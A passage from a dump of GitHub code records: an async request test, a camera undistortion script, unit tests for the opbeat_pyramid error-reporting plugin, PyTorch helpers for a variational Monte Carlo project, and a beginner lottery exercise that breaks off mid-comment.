sleep = 15\n urls = get_urls('/tests/async?duration=', sleep)\n\n start = time.time()\n\n with ThreadPoolExecutor(max_workers=10) as Pool:\n response = Pool.map(client.get, urls)\n\n print(f'time required {time.time() - start}')\n for res in response:\n print(res.json())\n\n return response\n","repo_name":"hodoodang/web-server-template","sub_path":"tests/api/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73043566507","text":"import cv2, os, glob\nfrom lib.camera import undistort\nfrom lib.calibrate import cal_imgs_dir, cal_imgs_glob, output_dir\n\n\n## Use the calibrated camera's undistort function to run test images\n\n## Create 'calib_undistorted/' in output_images/ path if not exists\noutput_path = output_dir+'calib_undistorted/'\nif not os.path.exists(output_path):\n os.makedirs(output_path)\n\n## Run camera_cal/ images and save in above folder\nimages = [(cv2.imread(imgpath), imgpath) for imgpath in cal_imgs_glob]\nfor img, imgpath in images:\n undist = undistort(img)\n name = imgpath.split(cal_imgs_dir)[1]\n cv2.imwrite(output_path+name, undist)\n\n## Run test_images/ images and save in above folder\ntest_imgs_glob = glob.glob('test_images/*.jpg')\nimages = [(cv2.imread(imgpath), imgpath) for imgpath in test_imgs_glob]\nfor img, imgpath in images:\n undist = undistort(img)\n name = imgpath.split('test_images/')[1]\n cv2.imwrite(output_path+name, undist)\n","repo_name":"fuzzthink/p4-advanced-lane-lines","sub_path":"test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13488615772","text":"import collections\nimport functools\nimport mock\nimport os\nimport unittest\n\nfrom pyramid import httpexceptions\nfrom pyramid import testing\n\nfrom opbeat_pyramid import subscribers\n\n\nMOCK_APP_ID = 'mock app id'\nMOCK_SECRET_TOKEN = 'mock secret token'\n\nSETTING_NAME = 'mock_setting'\nEXPECTED_VALUE = 'Expected Value'\nUNEXPECTED_VALUE = 'Unexpected Value'\n\nENV_SETTING_NAME = 'mock_env_setting'\nEXPECTED_ENV_VALUE = 'Expected Env Value'\nUNEXPECTED_ENV_VALUE = 'Unexpected Env Value'\n\nDEFAULT_VALUE = 'Default Value'\n\nMOCK_QUERY_STRING = 'mock&query=string'\n\nMOCK_USER_AGENT = (\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) '\n 'AppleWebKit/534.46 (KHTML, like Gecko) '\n 'Version/5.1 Mobile/9A334 Safari/7534.48.3'\n)\n\nMockRequestEvent = collections.namedtuple('RequestEvent', 'request')\n\n\nclass OpbeatSubscribersTestCase(unittest.TestCase):\n def setUp(self):\n setting_key = 'opbeat.' + SETTING_NAME\n\n self.config = testing.setUp()\n self.request = testing.DummyRequest(self.config)\n\n self.request.client_addr = '0.0.0.0'\n self.request.exc_info = None\n self.request.host = 'example.com:443'\n self.request.scheme = 'https'\n self.request.user_agent = MOCK_USER_AGENT\n\n self.request.matched_route = mock.MagicMock()\n self.request.matched_route.name = 'example_view'\n\n self.settings = self.request.registry.settings = {\n setting_key: EXPECTED_VALUE,\n 'mock_setting': UNEXPECTED_VALUE,\n 'opbeat.enabled': 'true',\n 'opbeat.module_name': 'mock',\n 'opbeat.app_id': 'mock app id',\n 'opbeat.secret_token': MOCK_SECRET_TOKEN,\n 'opbeat.organization_id': MOCK_SECRET_TOKEN,\n }\n\n os.environ['OPBEAT_MOCK_ENV_SETTING'] = EXPECTED_ENV_VALUE\n os.environ['MOCK_ENV_SETTING'] = UNEXPECTED_ENV_VALUE\n\n def tearDown(self):\n del os.environ['OPBEAT_MOCK_ENV_SETTING']\n del os.environ['MOCK_ENV_SETTING']\n\n def test_get_opbeat_setting_gets_value_from_request_settings(self):\n value = subscribers.get_opbeat_setting(self.request, SETTING_NAME)\n self.assertIs(value, EXPECTED_VALUE)\n\n def test_get_opbeat_setting_gets_value_from_env_settings(self):\n value = subscribers.get_opbeat_setting(self.request, ENV_SETTING_NAME)\n self.assertEqual(value, EXPECTED_ENV_VALUE)\n\n def test_get_opbeat_setting_prefers_environment_over_settings(self):\n local_name = 'opbeat_some_setting'\n local_name_upper = local_name.upper()\n\n os.environ[local_name_upper] = EXPECTED_ENV_VALUE\n value = subscribers.get_opbeat_setting(self.request, 'some_setting')\n del os.environ[local_name_upper]\n\n self.assertEqual(value, EXPECTED_ENV_VALUE)\n\n def test_get_opbeat_setting_returns_default_when_not_set(self):\n self.assertIs(DEFAULT_VALUE, subscribers.get_opbeat_setting(\n self.request,\n 'unknown_setting',\n default=DEFAULT_VALUE,\n ))\n\n def test_get_opbeat_setting_raises_ValueError_without_a_default(self):\n break_shit = functools.partial(\n subscribers.get_opbeat_setting,\n self.request,\n 'unknown_setting',\n )\n\n self.assertRaises(ValueError, break_shit)\n\n @mock.patch('opbeat.Client')\n def test_opbeat_client_factory_returns_an_opbeat_client(self, Client):\n MOCK_RETURN_VALUE = {}\n Client.return_value = MOCK_RETURN_VALUE\n\n result = subscribers.opbeat_client_factory(self.request)\n Client.assert_called_once()\n\n self.assertIs(result, MOCK_RETURN_VALUE)\n\n @mock.patch('opbeat.Client')\n def test_opbeat_client_factory_caches_by_app_id(self, Client):\n subscribers.opbeat_client_factory(self.request)\n subscribers.opbeat_client_factory(self.request)\n Client.assert_called_once()\n\n @mock.patch('opbeat.Client')\n def test_opbeat_client_factory_wont_cache_separate_apps(self, Client):\n subscribers.opbeat_client_factory(self.request)\n\n self.settings['opbeat.app_id'] = 'Another App ID'\n subscribers.opbeat_client_factory(self.request)\n\n self.assertEqual(Client.call_count, 2)\n\n def test_setting_is_enabled_returns_true_for_truthy_values(self):\n is_enabled = functools.partial(\n subscribers.setting_is_enabled,\n self.request,\n 'truthy_value',\n )\n\n self.settings['opbeat.truthy_value'] = True\n self.assertTrue(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'true'\n self.assertTrue(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'on'\n self.assertTrue(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'yes'\n self.assertTrue(is_enabled())\n\n def test_setting_is_enabled_returns_false_for_falsy_values(self):\n is_enabled = functools.partial(\n subscribers.setting_is_enabled,\n self.request,\n 'truthy_value',\n )\n\n self.settings['opbeat.truthy_value'] = False\n self.assertFalse(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'false'\n self.assertFalse(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'off'\n self.assertFalse(is_enabled())\n\n self.settings['opbeat.truthy_value'] = 'no'\n self.assertFalse(is_enabled())\n\n def test_get_request_module_name_returns_module_name_from_settings(self):\n module_name = subscribers.get_request_module_name(self.request)\n self.assertEqual(module_name, 'mock')\n\n def test_get_request_module_name_returns_default_if_setting_missing(self):\n del self.settings['opbeat.module_name']\n\n module_name = subscribers.get_request_module_name(self.request)\n self.assertEqual(module_name, 'UNKNOWN_MODULE')\n\n def test_get_safe_settings_returns_settings_without_unsafe_keywords(self):\n MOCK_KEYS = [\n 'unsafe_token', 'SECRET_ID', 'MockPassword',\n 'passphrase', 'private_item', 'local_key',\n ]\n\n del self.settings['opbeat.secret_token']\n\n for key in MOCK_KEYS:\n absolute_key = 'opbeat.' + key\n self.settings[absolute_key] = 'mock unsafe token'\n\n results = subscribers.get_safe_settings(self.request)\n\n num_results = len(results.keys())\n num_settings = len(self.settings)\n num_bad_keys = len(MOCK_KEYS)\n\n for key in MOCK_KEYS:\n self.assertNotIn('opbeat.' + key, results)\n\n self.assertEqual(num_results, num_settings - num_bad_keys)\n\n def test_should_ignore_HttpException_returns_false_by_default(self):\n mock_exc_info = [None, httpexceptions.HTTPNotFound()]\n\n self.assertFalse(subscribers.should_ignore_exception(\n self.request,\n mock_exc_info,\n ))\n\n def test_should_ignore_HttpException_returns_true_when_enabled(self):\n settings = self.settings\n settings['opbeat.ignore_http_exceptions'] = 'true'\n mock_exc_info = [None, httpexceptions.HTTPNotFound()]\n\n self.assertTrue(subscribers.should_ignore_exception(\n self.request,\n mock_exc_info,\n ))\n\n def test_should_not_ignore_exceptions_unless_they_are_HttpExceptions(self):\n self.settings['opbeat.ignore_http_exceptions'] = 'true'\n mock_exc_info = [None, ValueError()]\n\n self.assertFalse(subscribers.should_ignore_exception(\n self.request,\n mock_exc_info,\n ))\n\n def test_should_ignore_HttpException_returns_false_when_disabled(self):\n self.settings['opbeat.ignore_http_exceptions'] = 'false'\n mock_exc_info = [None, httpexceptions.HTTPNotFound()]\n\n self.assertFalse(subscribers.should_ignore_exception(\n self.request,\n mock_exc_info,\n ))\n\n @mock.patch('opbeat.Client')\n def test_capture_exception_ignores_errors_from_opbeat_client(self, Client):\n # NOTE: This uses a catchall which seems bad, but we do it right now.\n\n client = mock.MagicMock()\n client.capture_exception.side_effect = ValueError()\n Client.return_value = client\n\n mock_exc_info = [None, ValueError()]\n\n self.assertRaises(ValueError, client.capture_exception)\n subscribers.capture_exception(self.request, mock_exc_info, extra={})\n self.assertEqual(2, client.capture_exception.call_count)\n\n @mock.patch('opbeat.Client')\n def test_handle_exception_sends_an_exception_to_opbeat(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n self.request.query_string = MOCK_QUERY_STRING\n mock_exc_info = [None, ValueError()]\n\n subscribers.handle_exception(self.request, mock_exc_info)\n\n expected_data = {\n 'http': {\n 'url': 'https://example.com:443/',\n 'method': 'GET',\n 'query_string': MOCK_QUERY_STRING,\n }\n }\n\n mock_extra_metadata = {\n 'client_ip_address': self.request.client_addr,\n 'logging_successful': 'true',\n 'url': self.request.url,\n 'user_agent': self.request.user_agent,\n }\n\n mock_extra_metadata.update(subscribers.get_safe_settings(self.request))\n\n client.capture_exception.assert_called_once_with(\n mock_exc_info,\n data=expected_data,\n extra=mock_extra_metadata,\n )\n\n @mock.patch('opbeat.Client')\n @mock.patch('opbeat_pyramid.subscribers.should_ignore_exception')\n def test_handle_exception_ignores_ignored_exceptions(self, mock, Client):\n mock.return_value = True\n mock_exc_info = [None, httpexceptions.HTTPNotFound()]\n\n client = mock.MagicMock()\n Client.return_value = client\n\n subscribers.handle_exception(self.request, mock_exc_info)\n mock.assert_called_once_with(self.request, mock_exc_info)\n client.capture_exception.assert_not_called()\n\n def test_get_exception_for_request_returns_exc_info_if_not_None(self):\n self.request.exc_info = ''\n exc_info = subscribers.get_exception_for_request(self.request)\n self.assertIs(exc_info, self.request.exc_info)\n\n @mock.patch('sys.exc_info')\n def test_get_exception_for_request_uses_sys_as_fallback(self, _exc_info):\n e = ValueError()\n mock_exc_info = (type(e), e)\n\n self.request.exc_info = None\n _exc_info.return_value = mock_exc_info\n exc_info = subscribers.get_exception_for_request(self.request)\n self.assertEquals(exc_info, mock_exc_info)\n _exc_info.assert_called_once()\n\n @mock.patch('sys.exc_info')\n def test_get_exception_for_request_no_exception(self, _exc_info):\n self.request.exc_info = None\n _exc_info.return_value = (None, None, None)\n exc_info = subscribers.get_exception_for_request(self.request)\n self.assertIs(exc_info, None)\n _exc_info.assert_called_once()\n\n def test_opbeat_tween_gets_response_if_no_error_occured(self):\n mock_response = {}\n\n handler = mock.MagicMock()\n handler.return_value = mock_response\n\n response = subscribers.opbeat_tween(\n handler,\n self.request.registry,\n self.request,\n )\n\n self.assertIs(response, mock_response)\n handler.assert_called_once_with(self.request)\n\n @mock.patch('sys.exc_info')\n @mock.patch('opbeat_pyramid.subscribers.handle_exception')\n def test_opbeat_tween_raises_handler_exceptions(self, handle_exc, mock):\n exc_info = mock.return_value = [None, ValueError()]\n\n handler = mock.MagicMock()\n handler.side_effect = exc_info[1]\n\n break_shit = functools.partial(\n subscribers.opbeat_tween,\n handler,\n self.request.registry,\n self.request,\n )\n\n self.assertRaises(ValueError, break_shit)\n handle_exc.assert_called_once_with(self.request, exc_info)\n\n @mock.patch('sys.exc_info')\n @mock.patch('opbeat_pyramid.subscribers.handle_exception')\n def test_opbeat_tween_raises_sys_exceptions(self, handle_exc, mock):\n e = ValueError()\n exc_info = mock.return_value = [type(e), e]\n\n handler = mock.MagicMock()\n handler.return_value = ''\n\n subscribers.opbeat_tween(handler, self.request.registry, self.request)\n\n handle_exc.assert_called_once_with(self.request, exc_info)\n\n def test_get_status_code_returns_status_code_from_response(self):\n code = 415\n self.request.response.status_code = code\n self.assertEqual(code, subscribers.get_status_code(self.request))\n\n def test_get_status_code_returns_exception_code_if_not_None(self):\n self.request.exc_info = [None, httpexceptions.HTTPNotFound()]\n self.assertEqual(404, subscribers.get_status_code(self.request))\n\n def test_get_route_name_uses_view_name_if_available(self):\n self.request.view_name = 'example.view'\n\n # Ensure these are set to ensure view_name is preferred\n self.request.matched_route.name = 'something_bad_happened'\n\n route_name = subscribers.get_route_name(self.request)\n self.assertIs(self.request.view_name, route_name)\n\n def test_get_route_name_uses_matched_route_if_available(self):\n route_name = subscribers.get_route_name(self.request)\n self.assertEqual('mock.example_view', route_name)\n\n def test_get_route_name_uses_unknown_route_name_setting_as_fallback(self):\n MOCK_UNKNOWN_ROUTE_NAME = 'Mock Unknown Route'\n\n self.request.view_name = None\n self.request.matched_route = None\n\n self.settings['opbeat.unknown_route_name'] = MOCK_UNKNOWN_ROUTE_NAME\n route_name = subscribers.get_route_name(self.request)\n self.assertEqual(route_name, MOCK_UNKNOWN_ROUTE_NAME)\n\n @mock.patch('opbeat_pyramid.subscribers.opbeat_tween')\n def test_opbeat_tween_factory_returns_a_curried_tween_function(self, mock):\n handler = {}\n\n registry = self.request.registry\n\n result = subscribers.opbeat_tween_factory(handler, registry)\n\n mock.assert_not_called()\n result(self.request)\n mock.assert_called_once_with(handler, registry, self.request)\n\n @mock.patch('opbeat.Client')\n def test_on_request_begin_starts_a_transaction(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n self.request.add_finished_callback = mock.MagicMock()\n\n mock_event = MockRequestEvent(self.request)\n subscribers.on_request_begin(mock_event)\n\n client.begin_transaction.assert_called_once()\n\n self.request.add_finished_callback.assert_called_once_with(\n subscribers.on_request_finished,\n )\n\n @mock.patch('opbeat.Client')\n def test_on_request_begin_is_a_noop_if_opbeat_disabled(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n self.settings['opbeat.enabled'] = False\n self.request.add_finished_callback = mock.MagicMock()\n\n mock_event = MockRequestEvent(self.request)\n subscribers.on_request_begin(mock_event)\n\n client.begin_transaction.assert_not_called()\n self.request.add_finished_callback.assert_not_called()\n\n @mock.patch('opbeat.Client')\n def test_on_request_finished_ends_the_current_transaction(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n self.request._opbeat_client = client\n\n client.end_transaction.assert_not_called()\n subscribers.on_request_finished(self.request)\n\n client.end_transaction.assert_called_once_with(\n 'mock.example_view',\n 200,\n )\n\n @mock.patch('opbeat.Client')\n def test_on_request_finished_does_nothing_if_disabled(self, Client):\n client = mock.MagicMock()\n Client.return_value = client\n\n client.end_transaction.assert_not_called()\n subscribers.on_request_finished(self.request)\n\n client.end_transaction.assert_not_called()\n","repo_name":"monokrome/opbeat_pyramid","sub_path":"opbeat_pyramid/subscribers_spec.py","file_name":"subscribers_spec.py","file_ext":"py","file_size_in_byte":16095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8548621922","text":"# encoding: utf-8\n\nimport torch\nimport time\nimport numpy as np\nimport multiprocessing\nfrom multiprocessing import cpu_count\nimport logging\nimport os\nfrom torch import nn, Tensor\nfrom typing import Hashable, List, Tuple, Dict, Union, Callable\nfrom torch.utils.data import Dataset\n\ndef unique(x, dim=None):\n \"\"\"Unique elements of x and indices of those unique elements\n https://github.com/pytorch/pytorch/issues/36748#issuecomment-619514810\n\n e.g.\n\n unique(tensor([\n [1, 2, 3],\n [1, 2, 4],\n [1, 2, 3],\n [1, 2, 5]\n ]), dim=0)\n => (tensor([[1, 2, 3],\n [1, 2, 4],\n [1, 2, 5]]),\n tensor([0, 1, 3]))\n \"\"\"\n unique, inverse_indices = torch.unique(x, sorted=True, return_inverse=True, dim=dim)\n perm = torch.arange(inverse_indices.size(0), dtype=inverse_indices.dtype,\n device=inverse_indices.device)\n inverse, perm = inverse_indices.flip([0]), perm.flip([0])\n indices = inverse.new_empty(unique.size(0)).scatter_(0, inverse, perm)\n return unique, indices, inverse_indices\n\ndef unique_row_view(data, unique_args=dict()):\n b = np.ascontiguousarray(data).view(\n np.dtype((np.void, data.dtype.itemsize * data.shape[1])))\n return np.unique(b, **unique_args)\n\nclass SampleBuffer(Dataset):\n def __init__(self, device, state_size, precision=torch.float32):\n \"\"\"\n A buffer for storing samples from Markov chain sampler, keeping the most\n probable sample for the next policy update.\n \"\"\"\n self._device = device\n if len(state_size) == 2:\n self.single_state_shape = [state_size[0]]\n self.N = state_size[0]\n else:\n self.single_state_shape = [state_size[0], state_size[1]]\n self.N = state_size[0]*state_size[1]\n self.Dp = state_size[-1] # number of physical spins\n self.pow_list = np.arange(self.N-1, -1, -1)\n self._precision = precision\n\n def update(self, states, logphis, thetas, counts, \n update_states, update_psis, update_coeffs, efflens, preload_size, batch_size):\n self.states = states\n # self.sym_states = sym_states\n self.logphis = logphis\n self.thetas = thetas\n self.counts = counts\n self.update_states = update_states\n self.update_psis = update_psis\n self.update_coeffs = update_coeffs\n self.efflens = efflens\n self.get_uniques()\n \n # self._preload_size = preload_size\n # self._batch_size = batch_size\n\n if preload_size >= self.uss_len:\n self._preload_size = self.uss_len\n self._batch_size = 0\n self._sd = 0\n else:\n self._preload_size = preload_size\n self._batch_size = batch_size\n n_sample = self.uss_len - self._preload_size\n self._sd = 1 if n_sample < self._batch_size else int(np.ceil(n_sample/self._batch_size))\n\n if self._sd > 1:\n self._preload_size += n_sample - (self._sd-1)*self._batch_size\n\n\n batch_label = np.arange(self._preload_size)\n self.preload_uss = self.unique_uss[batch_label,:]\n self.rest_unique_uss = self.unique_uss[self._preload_size:,:]\n\n # print(preload_size, self._preload_size, self.uss_len - self._preload_size)\n return\n \n def get_energy_ops(self):\n logphi = torch.from_numpy(self.logphis)\n theta = torch.from_numpy(self.thetas)\n logphi_ops = torch.from_numpy(self.update_psis[:,:,0])\n theta_ops = torch.from_numpy(self.update_psis[:,:,1])\n\n with torch.no_grad():\n delta_logphi_os = logphi_ops - logphi[...,None]\n delta_theta_os = theta_ops - theta[...,None]\n op_coeffs = torch.from_numpy(self.update_coeffs)\n self.ops_real = torch.sum(op_coeffs*torch.exp(delta_logphi_os)*torch.cos(delta_theta_os), 1)\n self.ops_imag = torch.sum(op_coeffs*torch.exp(delta_logphi_os)*torch.sin(delta_theta_os), 1)\n return \n \n def get_uniques(self):\n # calculate unique symmetry states\n # sym_ss_v0 = self.sym_states[:,0,0,:].reshape(-1, self.N).astype(np.int8)\n # self.symss_len = len(unique_row_view(sym_ss_v0))\n\n # sym_ss = self.sym_states.reshape([-1, self.Dp]+self.single_state_shape)\n # sym_ss_vs = sym_ss[:,0,:].reshape(-1, self.N).astype(np.int8)\n # _, sym_indices, self.sym_inverse_indices = unique_row_view(sym_ss_vs, \n # unique_args=dict(return_index=True, return_inverse=True))\n # self.unique_symss = sym_ss[sym_indices]\n\n uss = self.update_states.reshape([-1, self.Dp]+self.single_state_shape)\n ussv = uss[:,0,:].reshape(-1, self.N)\n _, indices, self.uss_inverse_indices = unique_row_view(ussv, \n unique_args=dict(return_index=True, return_inverse=True))\n self.unique_uss = uss[indices]\n self.uss_len = len(self.unique_uss)\n return \n\n def __len__(self):\n return self.uss_len - self._preload_size\n \n def cut_samples(self, preload_size=100, batch_size=100, batch_type='equal'):\n # n_sample = len(self.states) - preload_size\n n_sample = self.uss_len - preload_size\n devision_len = batch_size\n\n # if n_sample + preload_size <= batch_size:\n # self.batch_label = np.arange(n_sample)[None,...]\n # elif batch_type == 'rand':\n # self.batch_label = np.random.choice(n_sample, batch_size, replace=False)[None,...]\n # elif batch_type == 'equal':\n self.batch_label = []\n for i in range(self._sd):\n if i < self._sd - 1:\n self.batch_label.append(np.arange(i*devision_len+preload_size, (i+1)*devision_len+preload_size))\n elif i*devision_len+preload_size == n_sample+preload_size:\n self._sd -= 1\n break\n else:\n self.batch_label.append(np.arange(i*devision_len+preload_size, n_sample+preload_size))\n return\n\n def get_states(self):\n gpu_states = torch.from_numpy(self.states).to(self._precision).to(self._device)\n #gpu_sym_states = torch.from_numpy(self.unique_symss).float().to(self._device)\n #gpu_sym_ii = torch.from_numpy(self.sym_inverse_indices).to(self._device)\n\n gpu_counts = torch.from_numpy(self.counts).to(self._precision).to(self._device)\n gpu_logphi0 = torch.from_numpy(self.logphis).to(self._precision).to(self._device)\n gpu_theta0 = torch.from_numpy(self.thetas).to(self._precision).to(self._device)\n\n gpu_update_coeffs = torch.from_numpy(self.update_coeffs).to(self._precision).to(self._device)\n gpu_uss_inverse_indices = torch.from_numpy(self.uss_inverse_indices).to(self._device)\n \n pre_gpu_update_states_unique = torch.from_numpy(self.preload_uss).to(self._precision).to(self._device)\n\n return gpu_states, gpu_counts, gpu_logphi0, gpu_theta0, \\\n gpu_update_coeffs, gpu_uss_inverse_indices, pre_gpu_update_states_unique\n\n def get(self, idx=1, batch_size=100, batch_type='all'):\n \n if batch_type == 'all':\n batch_label = self.batch_label[idx]\n selected_uss = self.unique_uss[batch_label,:]\n gpu_update_states_unique = torch.from_numpy(selected_uss).to(self._precision).to(self._device)\n return dict(update_states_unique=gpu_update_states_unique)\n else: \n # random batch \n batch_label = np.random.choice(len(self.states), batch_size, replace=False)[None,...] \n\n batch_states = torch.from_numpy(self.states[batch_label,:]).to(self._precision).to(self._device)\n batch_counts = torch.from_numpy(self.counts[batch_label,:]).to(self._precision).to(self._device)\n batch_logphi0 = torch.from_numpy(self.logphis[batch_label,:]).to(self._precision).to(self._device)\n batch_theta0 = torch.from_numpy(self.thetas[batch_label,:]).to(self._precision).to(self._device)\n batch_ucs = torch.from_numpy(self.update_coeffs[batch_label,:]).to(self._precision).to(self._device)\n batch_uss = torch.from_numpy(self.update_states[batch_label,:]).to(self._precision).to(self._device)\n return dict(states=batch_states, counts=batch_counts, logphi=batch_logphi0,\n theta=batch_theta0, ucs=batch_ucs, uss=batch_uss)\n\n def __getitem__(self, idx):\n #batch_label = self.batch_label[idx]\n selected_uss = self.rest_unique_uss[idx,:]\n gpu_update_states_unique = torch.from_numpy(selected_uss).to(self._precision).to(self._device)\n return gpu_update_states_unique\n \ndef _get_unique_states(states, logphis, thetas, ustates, upsis, ucoeffs, efflens):\n \"\"\"\n Returns the unique states, their coefficients and the counts.\n \"\"\"\n states, indices, counts = np.unique(states, return_index=True, return_counts=True, axis=0)\n logphis = logphis[indices]\n thetas = thetas[indices]\n ustates = ustates[indices]\n upsis = upsis[indices]\n ucoeffs = ucoeffs[indices]\n efflens = efflens[indices]\n return states, logphis, thetas, counts, ustates, upsis, ucoeffs, efflens\n\ndef find_states_and_ops(model, operator, states, single_state_shape ,cal_ops=False):\n with torch.no_grad():\n n_sample = states.shape[0]\n update_states = np.zeros([n_sample, operator._update_size] + single_state_shape)\n update_psis = np.zeros([n_sample, operator._update_size, 2])\n update_coeffs = np.zeros([n_sample, operator._update_size])\n efflens = np.zeros([n_sample], dtype=np.int64)\n \n if cal_ops:\n for i,state in enumerate(states):\n update_states[i], update_coeffs[i], efflen = operator.find_states(state)\n efflens[i] = efflen\n ustates = update_states[i,:efflen,:].reshape([-1]+single_state_shape)\n upsis = model(torch.from_numpy(ustates).float())\n update_psis[i,:efflen,:] = upsis.numpy().reshape([1, efflen, 2])\n else:\n for i,state in enumerate(states):\n update_states[i], update_coeffs[i], efflen = operator.find_states(state)\n efflens[i] = efflen\n ustates = update_states[i,:efflen,:].reshape([-1]+single_state_shape)\n ustates = model.pick_sym_config(torch.from_numpy(ustates)).numpy()\n update_states[i,:efflen,:] = ustates.reshape(update_states[i,:efflen,:].shape)\n return update_states, update_psis, update_coeffs, efflens\n\ndef _generate_updates(states, model, operator, single_state_shape, update_size, threads):\n \"\"\"\n Generates updated states and coefficients for an Operator.\n\n Args:\n states: The states with shape (batch size, shape of state).\n operator: The operator used for updating the states.\n state_size: shape of a state in states\n update_size: number of update_states\n\n Returns:\n The updated states and their coefficients. The shape of the updated\n states is (batch size, num of updates, shape of state), where num of\n updates is the largest number of updated states among all given states.\n If a state has fewer updated states, its updates are padded with the\n original state.\n\n \"\"\"\n n_sample = states.shape[0]\n ustates = np.zeros([n_sample, update_size] + single_state_shape)\n ucoeffs = np.zeros([n_sample, update_size])\n efflens = np.zeros([n_sample], dtype=np.int64)\n\n pool = multiprocessing.Pool(threads)\n results = []\n cnt = 0\n \n for state in states:\n results.append(pool.apply_async(find_states_and_ops, \n (model, operator, state, single_state_shape, )))\n pool.close()\n pool.join()\n\n for cnt, res in enumerate(results):\n ustates[cnt], ucoeffs[cnt], efflens[cnt] = res.get()\n\n return ustates, ucoeffs, efflens\n\n# logger definitions\ndef get_logger(filename, verbosity=0, name=None):\n\n path = filename[0:filename.rfind(\"/\")]\n if not os.path.isdir(path):\n os.makedirs(path)\n if not os.path.isfile(filename):\n fd = open(filename, mode=\"w\", encoding=\"utf-8\")\n fd.close()\n\n level_dict = {0: logging.DEBUG, 1: logging.INFO, 2: logging.WARNING}\n formatter = logging.Formatter(\n \"[%(asctime)s][%(filename)s][%(levelname)s] %(message)s\")\n logger = logging.getLogger(name)\n logger.setLevel(level_dict[verbosity])\n\n if logger.hasHandlers():\n logger.handlers.clear()\n\n fh = logging.FileHandler(filename, \"w\")\n fh.setLevel(level_dict[verbosity+1])\n fh.setFormatter(formatter) \n logger.addHandler(fh)\n\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n\n return logger\n\ndef rot60(A, num=1, dims=[0,1], center=[0]):\n num = num%6\n input_shape = A.shape\n L = A.shape[dims[0]]\n W = A.shape[dims[1]]\n A = A.reshape(-1,L,W)\n \n X, Y = torch.meshgrid(torch.arange(W), torch.arange(L))\n B = A.clone() \n Xrot, Yrot = X, Y\n for _ in range(num):\n Xrot, Yrot = (Xrot - Yrot + center[0])%L, Xrot\n B[:, Xrot, Yrot] = A[:, X, Y]\n return B.reshape(input_shape)\n\ndef decimalToAny(n,x):\n # a=[0,1,2,3,4,5,6,7,8,9,'A','b','C','D','E','F']\n b=[]\n while True:\n s=n//x \n y=n%x \n b=b+[y]\n if s==0:\n break\n n=s\n b.reverse()\n\n return b\n\ndef _del_nested_attr(obj: nn.Module, names: List[str]) -> None:\n \"\"\"\n Deletes the attribute specified by the given list of names.\n For example, to delete the attribute obj.conv.weight,\n use _del_nested_attr(obj, ['conv', 'weight'])\n \"\"\"\n if len(names) == 1:\n delattr(obj, names[0])\n else:\n _del_nested_attr(getattr(obj, names[0]), names[1:])\n\ndef _set_nested_attr(obj: nn.Module, names: List[str], value: Tensor) -> None:\n \"\"\"\n Set the attribute specified by the given list of names to value.\n For example, to set the attribute obj.conv.weight,\n use _del_nested_attr(obj, ['conv', 'weight'], value)\n \"\"\"\n if len(names) == 1:\n setattr(obj, names[0], value)\n else:\n _set_nested_attr(getattr(obj, names[0]), names[1:], value)\n\ndef extract_weights(mod: nn.Module) -> Tuple[Tuple[Tensor, ...], List[str]]:\n \"\"\"\n This function removes all the Parameters from the model and\n return them as a tuple as well as their original attribute names.\n The weights must be re-loaded with `load_weights` before the model\n can be used again.\n Note that this function modifies the model in place and after this\n call, mod.parameters() will be empty.\n \"\"\"\n orig_params = tuple(mod.parameters())\n # Remove all the parameters in the model\n names = []\n for name, p in list(mod.named_parameters()):\n _del_nested_attr(mod, name.split(\".\"))\n names.append(name)\n\n # Make params regular Tensors instead of nn.Parameter\n params = tuple(p.detach().requires_grad_() for p in orig_params)\n return params, names\n\ndef load_weights(mod: nn.Module, names: List[str], params: Tuple[Tensor, ...]) -> None:\n \"\"\"\n Reload a set of weights so that `mod` can be used again to perform a forward pass.\n Note that the `params` are regular Tensors (that can have history) and so are left\n as Tensors. This means that mod.parameters() will still be empty after this call.\n \"\"\"\n for name, p in zip(names, params):\n _set_nested_attr(mod, name.split(\".\"), p)\n \n \ndef np_rot60(A, num=1, axes=[0,1],center=[0]):\n input_shape = A.shape\n L = A.shape[axes[0]]\n W = A.shape[axes[1]]\n A = A.reshape(-1,L,W)\n \n X, Y = np.meshgrid(np.arange(W), np.arange(L))\n B = A.copy() \n Xrot, Yrot = X, Y\n for _ in range(num):\n Xrot, Yrot = (Xrot - Yrot + center[0])%L, Xrot\n B[:, Xrot, Yrot] = A[:, X, Y]\n return B.reshape(input_shape)\n\n\n","repo_name":"chenfeng2013301020145/VMC-PPO","sub_path":"utils_ppo.py","file_name":"utils_ppo.py","file_ext":"py","file_size_in_byte":15981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24850998298","text":"'''\n9-14: Lottery: Make a list or tuple containing a series of 10 numbers and 5 letters. Randomly select\nfour numbers or letters from the list and print a message saying that any ticket matching these four numbers\nor letters wins a prize\n'''\nfrom random import randint\n\nlottery_choices = ['A', 'B', 'C', 'D', 'E', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\nwinning_ticket = 'C2A9'\n\nbought_ticket = []\n\ncounter = 0\n\ndef generate_ticket():\n for i in range(0, 4):\n bought_ticket.append(lottery_choices[randint(0, len(lottery_choices) - 1)])\n print(''.join(bought_ticket))\n\n\nwhile True:\n generate_ticket()\n\n if ''.join(bought_ticket) != winning_ticket:\n print(\"Not a winning ticket!\")\n counter += 1\n bought_ticket.clear()\n else:\n break\n\nprint('Winning Ticket: ', ''.join(bought_ticket))\nprint(f'It only took {counter} times')\n\n'''\nSTYLING CLASSES\n--------------\nClasses names should be written in 